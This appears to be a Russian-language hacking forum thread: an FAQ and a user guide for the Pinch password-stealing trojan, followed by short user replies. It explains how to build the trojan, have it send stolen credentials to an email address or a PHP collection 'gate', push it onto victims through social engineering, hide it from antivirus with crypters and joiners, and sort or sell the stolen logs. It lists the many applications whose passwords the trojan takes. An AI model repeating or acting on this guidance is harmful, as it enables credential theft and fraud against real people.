Pinch , все о пинче в этой теме

[Erlien]

FAQ

1. Где я могу скачать Pinch?

Pinch 2.98 by Vaska (шлет отчеты на e-mail)
Pinch 2.99 by SLESH (шлет отчеты на гейт). Достает пароли от QIP 8020 и 8030.


Сложно на 100% гарантировать то, что эти пинчи ни с чем другим не склеены, поэтому все эксперименты с любыми троями рекомендуется проводить на виртуальной машине (например, на VMware WorkStation), в противном случае вы рискуете сами поплатиться своими паролями.

2. А какими возможностями обладает Pinch?

Pinch тащит пароли от:
- ICQ99b-2003a/Lite/ICQ2003Pro
- Miranda ICQ
- Trillian ICQ&AIM
- &RQ
- Gaim
- MSN Messenger
- Агент@Mail.ru
- Mozilla
- Firefox
- Opera
- E-Dialer
- V-Dialer
- Becky
- Mozilla Thunderbird
- The Bat!, The Bat! 2 (почта)
- Outlook/Outlook Express (pop3/imap)
- IE автозаполнение & защищённые сайты (Protected Storage) & ftp (поддерживаются 9x/Me/2k/xp)
- FAR Manager (ftp)
- Win/Total Commander (ftp)
- CuteFTP
- WS_FTP
- SmartFTP
- CoffeeCup Direct FTP
- FileZilla
- PuntoSwitcher
- FlashFXP
- Downloaders
- Regedit
- Удаленный Рабочий стол (RDP)
- Интернет (поддерживаются 9x/Me/2k/xp)

Собирает системную информацию: OS, memory, CPU, hard drives, logged user, host name, IP.

3. А как настроить пинч, чтобы он мне присылал отчеты на e-mail?

Рассмотрим настройку Pinch 2.98 by Vaska. Если вам надо, чтобы ваш трой присылал вам на мыло отчеты, то делаем следующее:

Регаем 2 мыла, допустим, на Рамблере (например, мы зарегистрировали ящики lol1@rambler.ru и lol2@rambler.ru). Затем открываем Pinch Builder (mail) и в поле Sender вводим:

E-mail - вводим первое зареганное мыло lol1@rambler.ru, с которого будет приходить отчет
SMTP Server - SMTP-сервер нашего почтовика - smtp.rambler.ru
User - логин на почту - lol1
Password - пароль на почту - qwerty1

В поле Receiver
E-mail - вводим второе зареганное мыло lol2@rambler.ru, на которую будет приходить отчет.
Subject - Тема письма, например, "Логи пинча".
FileName - Имя файла, прикрепленного к письму. Можно не трогать.

Прим.Erlien
можно указывать один адрес в поле отправителя и получателя , но в таком случии вы рискуете потерять ваще мыло ,т.к. пароль от ящика находится в исполнительном коде билда и при желании его можно вытащить

Жмем Build и сохраняем. Полученный файл впариваем жертве.

4. А как настроить пинч на гейт?

Если вам надо, чтобы пинч слал отчеты на гейт, то делаем следующее:
Регим сайт на бесплатном хостинге с подержкой php (holm.ru, jino-net.ru etc) и закидываем туда папку gate со всем ее содержимым (см. в архиве). На папки выставляем права 777, на скрипты - 775.
Открываем Pinch Builder (gate)
Вводим:
Host - адрес вашего сайта, например, www.mysite.h17.ru
Path - Путь до гейта, например, /gate/gate.php
Recepient - e-mail, на который дополнительно будут высылаться отчеты
Subject - Тема письма с отчетом.
File Name - Имя файла, прикрепленного к письму. Можно не трогать.

Жмем Build и сохраняем. Полученный файл впариваем жертве.


5. Я не могу открыть билдер - пишет "Ошибка доступа"

Отключите свой антивирус и/или файрволл.

6. Я попробовал запустить скомпилированный билд у себя, но отчеты не пришли. Почему?

Отключите свой антивирус и/или файрволл. Если не помогло, попробуйте заново скомпилировать билд и запуситить.

7. Пришли отчеты, но я не знаю чем их открыть...

Для этого есть Parser2 (находится в архиве вместе с билдером). Создаем в корне диска C папку Reports (т.е. C:\Reports\) и закидываем в нее свои отчеты. После этого запускаем парсер и в нем должны появиться отчеты. Если не появились, то, возможно, при отправке произошла ошибка и отчет пришел битым. В этом случае я вам ничем помочь не могу.

8. У жертвы стоит антивирус, а Pinch определяется антивирусом как троян и не дает его запустить. Как быть?

Воспользуйтесь криптером. Криптеры, которые можно бесплатно где-то скачать, вам не помогут, т.к. обычно палятся почти всеми антивирусами. Непалящийся криптор стоит денег. Большое предложение подобного софта можно найти и разделе Покупка/Продажа/Работа.

9. А как впарить жертве Pinch?

Используйте СИ (Социальная инженерия).

10. Как склеить Pinch с фоткой/программой?

Для этого существуют джойнеры. Опять же, те джойнеры, которые можно бесплатно скачать, обычно палятся почти всеми антивирусами. Поэтому лучше купить джойнер или заказать склейку.


Внимание!
не создавйте темы про пинч и ксинч , задавайте свои вопросы тут и вам ответят

Не ведитесь на предложения скачать новый Pinch 4/5/6 и etc, если не хотите чтобы вас протроянили. Будьте внимательны!
копирайты : фак ВВП с изменениями

Файлы:

пароль на все архивы AheadOfAll.org

Pinch 2.98 by Vaska (шлет отчеты на e-mail)
Pinch 2.99 by SLESH (шлет отчеты на гейт). Достает пароли от QIP 8020 и 8030.

pinch gate by genom v3.3


Руководство по версии 1.0

итак друзья мои --- недавно по случайному стечению обстоятельств мне пришлось заняться массовым протрояниванием (тссс.. только это секрет)

И как результат сначала я использовал троя с отправкой на мыло -- но согласитесь тупо получать на ящик сотни отчетов и потом их разгребать -- переименовывать -- сейвить etc..
Далее мною был опробован гейт -- он конечно более удобен и практичен но согласитесь некоторые проблемы -- как повторы -- пустые отчеты и тд. он решить немог да и заходить каждый день на ftp чтобы скачать отчеты напрягает.

Как следствие всего вышеизложенного в моем укуренном сохнание родилась мысль что надо этот процесс как-то упростить и автоматизировать. (в сознании промелькнула мысль:'лень двигатель прогресса' =) )
В итоге у меня получился по моему мнению довольно неплохой гейт с подробной статистикой удобным веб интерфейсом и функциональной автоматизацией =).

Итак начнем с самого главного с начала:
Дляработы гейта нам понадобится любой хост работающий на никсах с php.
Никсовый сервер нам нужен из-за того что архивация происходит с помошью команты tar выполняемой через system();
Если у вас сервак под виндой то либо убейте себя =) либо замените команды в теле скрипта.
Все это дело тестировалось мной на genom.h10.ru и работало на ура без каких либо отклонений =)

Итак сначала по отношению к внешнему виду -- дизайнер из меня хреновый так что сделал как смог.

Описание функционала:
Подготовка гейта к работе заключается в открывании его в любом текстовом редакторе и прописывании конфига:

$pass='genom'; # ваш пароль
$dirname = "logs"; # имя папки с логами
$autosend=100; # какими пачками будут отправляться вам на мыло отчеты -- если ноль то небудут
$mail='genom87@tut.by'; # мыло на которое гейт будет слать пароли
$autoclean=1; # автоочистка отчетов пришедших с одного ip 0-выкл 1-вкл

Итак сейвим код и заливаем на хост.
В результате имеем ссылку на него типа http://host.gov/gate.php
Если вы просто откроете в браузере http://host.gov/gate.php то нифига не увидите =) т.к. гейт расценит это как подключение трояна и засейвит отчет в виде [текущее время]_[текущая дата]_[ip с которого произошел коннект].bin
Например: 18-26-44_4-5-2007_127.0.0.1.bin
В такомже формате будут сейвиться пришедшие отчеты.
Правда он будет иметь нулевую длинну т.к вы ничего не передавали гейту.

Для того что-бы попасть в функциональную часть гейта нам нужно открыть http://host.gov/gate.php?stat=1
Вы увидите форму для ввода пароля -- пишите и создается get запрос http://host.gov/gate.php?pass=[пароль]
Следовательно если вам впадлу вводить пароль каждый раз то можете сразу переходить по линку http://host.gov/gate.php?pass=[пароль]
Тут поясним-- при вводе правильного пароля скрипт вешает вам кукис содержащий значение pass:[пароль] и редиректит вас обратно на http://host.gov/gate.php а скрипт уже видя что у вас висит нужный нам кукис и пароль совпадает впускает вас.

Так выглядит наш гейт:

http://genom.h10.ru/scr1.jpg
http://genom.h10.ru/scr2.jpg

На скринах есть некоторые пояснения- но я объясню все подробно:

Итак сначала идет конфиг в нем отображается папка в которую будут сохраняться отчеты--- количество найденных отчетов в папке -- состояние автоочистки (о ней позже) -- автоотсылка .. тут указывается количество отчетов при достижениия которого гейт выполнит автоматическую отправку на мыло в виде архива -- далее указано мыло на которе автоматически будут идти отчеты ----- и вв конце суммарный размер папки с отчетами .

Гейт признает за отчет любой файл а расширением .bin и если вы закинете впапку с отчетами какойнить лажи то она не войдет в размер папки и не будет отображаться в таблице отчетов.

Далее небольшая табличка в которой отображаются количество отчетов имеющих сегодняшнюю и вчерашнюю дату -- это удобно когда вам приходит много отчетов и вы можете реально оценить прирост отчетов например после вчерашней покупки трафика или вставки ифрейма.

Потом идет табличка для отправки отчетов на мыло в ручном режиме -- указываете количество -- указываете мыло -- можете выбрать удалить при этом отчеты или нет------- шлеп на кнопку и все отчеты у вас.
Или можно ненапрягаться людям продающим отчеты -- допустим купил человек 300 отчетов.. берете у него мыло -- шлеп на кнопку и все довольны =)

Ниже идет таблица отправки отчетов по размеру -- похоже на количество но отсылает указанный размер-- скрипт перебирает отчеты пока из суммарный размер не превысит указанный потом пакует и отправляет (этого на скрине нету ибо дописал недавно)

Снизу находится таблица для получения линка для скачивания отчетов -- указываете количество и жмете кнопку - архивируется файл down.tar.gz и после автоматического обновления странички эта таблица модифицируется и вы увидите ссылку для скачивания -- после скачки можете его удалить=)

Далее вы видите форму очистки отчетов -- сильно расписывать небуду -- все понятно можно удалить те или иные отчеты исходя из критериев даты-- ip -- размера -- или просто определенное количество.

Бинго наконецто мы дошли до самого главного...
Тут вы видите основную таблицу гейта в ней в нумерованном порядке можно увидеть все отчеты время прихода =) дату и ip ---------- в пятой колонке содержатся имена всех отчетов и линки на них -- можете кликнуть и скачать понравившийся вам отчет-------- следующая колонка показывает размер отчета причем они сортируются по цвету -- зеленые это отчеты меньше 8 кб -- -фиолетовые от 8 до 15 кб ---- остальные красные =) ======== в следующих двух колонках есть небольшой функционал можно удалить текущий отчет или отправить его на мыло указанное в конфиге.

~~~~~~~~~~~~~~~~~~~~
Итак с основным окном разобрались.
Теперь о автоочистке -- она находится в самом низу коа скрипта
гейт при получении отчета сохраняет его всегда -- далее он проверяет существует ли отчет с таким же ip как и у только что созданного-- если существует то происходит процедура проверки
Выбор какой отчет оставит гейт а какой удалит происходит по след схеме-- сначала он проверяет размер -- ели они различные то остается наибольший по размеру отчет - второй удаляется
Если размеры отчетов одинаковы от гейт оставляет более свежий отчет. т.е тот который только что пришел а старый удаляется.

[MaybeSex?]

Обьясните нубу что такое гейт..

[Erlien]

MaybeSex?,
вообще гейт -ворота
Скрипт который лежит на хостинге . он принимает и сохраняет отчеты ( или высылает их на мыло )
нужен во первых для того чтобы можно было удобно с помощью фтп скачать большой объем отчетов ( когда вам будут приходить сотни отчетов в сутки вы поймете что мыло это не лучший способ )
а во вторых дает большую безопасность , т.к. сам пинч не содержит никаких ваших паролей ( в случаи с отсылкой отчета на мыло самим пинчем он передает пароль от мыла в не зашифрованном виде)

ну и конечно прикрыть мыло гораздо проще чем абузный домен на абузном хостинге =)

[MaybeSex?]

Ну вот я скачал чтоб на мыло присылал. Распаковал и он не работает! Открывается досовский файл который закрывается.

[kadva]

а сколько примерно идет письмо от пинча??

[R1v3R]

kadva, минуту

[kadva]

спс большое!

[Smerch]

Мне отчет на мыло доходит за 5-10 секунд, но к сожалению не большими партиями а где-то 10 штук в день, поэтомму гейт не использую)))

[FiXeR]

Ну вот получил я отчёт, открыл его через программу, а где там достать пароль от ICQ?

[PinKО]

Erlien спс прикольная вещь :)